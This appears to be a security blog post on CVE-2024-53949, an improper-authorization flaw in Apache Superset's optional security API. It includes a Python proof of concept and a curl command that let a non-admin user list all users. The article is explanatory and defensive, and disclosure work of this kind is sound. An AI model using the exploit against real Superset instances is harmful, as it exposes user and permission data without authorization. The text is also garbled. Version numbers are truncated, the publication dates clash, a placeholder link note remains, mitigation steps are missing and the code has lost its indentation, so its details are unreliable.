Published: June 2024
Written by: Security Insights Team
Apache Superset is a popular open-source platform for data exploration and visualization. If your company runs dashboards using Superset, you need to pay attention to a recent security issue: CVE-2024-53949.
This vulnerability affects Superset versions 2.. up to (but not including) 4.1. when a certain feature is enabled. In this article, we'll break down what happened, how attackers could exploit it, and what you should do to stay protected.
In Simple Words
CVE-2024-53949 is an improper authorization vulnerability in Apache Superset. When the configuration FAB_ADD_SECURITY_API is enabled (note: it's disabled by default), users with lower privileges (who shouldn't have access) can reach sensitive API endpoints that typically only admins should use.
Official Source
- Apache Superset Security Advisory – CVE-2024-53949 *(update this link with the actual advisory)*
- NVD Entry for CVE-2024-53949
- Superset release notes 4.1.
Context
Superset uses Flask App Builder (FAB) for authentication and user management. It lets admins expose a security API (via FAB_ADD_SECURITY_API). By default, Superset disables this API, but in some setups, admins enable it for custom integration or automations.
The Problem
When you enable FAB_ADD_SECURITY_API, endpoints to manage roles and permissions become available. In affected versions, checks around these endpoints were incomplete: some endpoints did not adequately verify the current user's permissions. That means a low-privilege user could directly interact with APIs meant for admins.
With FAB_ADD_SECURITY_API enabled, the following endpoints are exposed
- /api/v1/security/role/
- /api/v1/security/permission/
- /api/v1/security/user/
...and more
Suppose Bob, a regular analyst (not admin), logs in and sends a request to list all users or fetch permissions. These calls should be blocked — but with this vulnerability, they can succeed.
Python POC Code
import requests
base_url = "https://superset.example.com";
session = requests.Session()
# Step 1: Login to Superset (example using basic auth)
login_payload = {"username": "attacker", "password": "weakpassword"}
login_resp = session.post(f"{base_url}/login/", data=login_payload)
# Step 2: Access the FAB security API endpoint
users_api = f"{base_url}/api/v1/security/user/"
headers = {'Accept': 'application/json'}
resp = session.get(users_api, headers=headers)
if resp.status_code == 200:
print("[+] Successfully fetched users:")
print(resp.json())
else:
print("[-] Could not access the user API; status code:", resp.status_code)
You might also use curl
curl -u attacker:weakpassword https://superset.example.com/api/v1/security/user/
Expected (Vulnerable) Output:
A complete JSON list of all users, visible to a non-admin.
Impact
- Loss of Confidentiality: Attackers might enumerate all users/roles/permissions.
- Privilege Escalation (Hypothetically): If attackers can POST/PUT/PATCH to these improperly protected endpoints, they might upgrade their own permissions.
Unless you *really* need this API for automation, keep it off.
3. Audit your logs for suspicious access to /api/v1/security/* by non-admins.
Upgrade guide:
Superset 4.1. Release Notes
References
- CVE-2024-53949 at NVD
- Apache Superset Security Advisories
- Superset Official Documentation
Final Thoughts
While this vulnerability only affects installations with FAB_ADD_SECURITY_API enabled, its potential impact is serious—especially in organizations that handle sensitive business data. Always keep Superset up to date, and regularly audit your configuration for any exposed security APIs.
If you found this post useful, share it with your devops, security, or BI teams — and help keep open-source data platforms secure.
*This article is independently written for educational and responsible disclosure purposes only. Do not attempt exploiting systems without permission!*
Timeline
Published on: 12/09/2024 14:15:12 UTC
Last modified on: 02/11/2025 15:31:54 UTC